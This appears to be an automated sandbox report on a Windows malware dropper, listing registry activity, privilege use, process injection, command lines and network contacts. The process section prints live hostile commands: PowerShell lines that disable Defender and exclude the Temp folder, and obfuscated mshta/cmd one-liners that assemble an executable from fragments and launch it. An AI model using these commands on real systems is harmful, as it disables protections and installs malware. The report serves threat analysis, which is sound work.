Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 272

C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp" /SL5="$4020C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 456

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FI 135.181.129.119:4805 tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:49288 tcp
N/A 127.0.0.1:49290 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
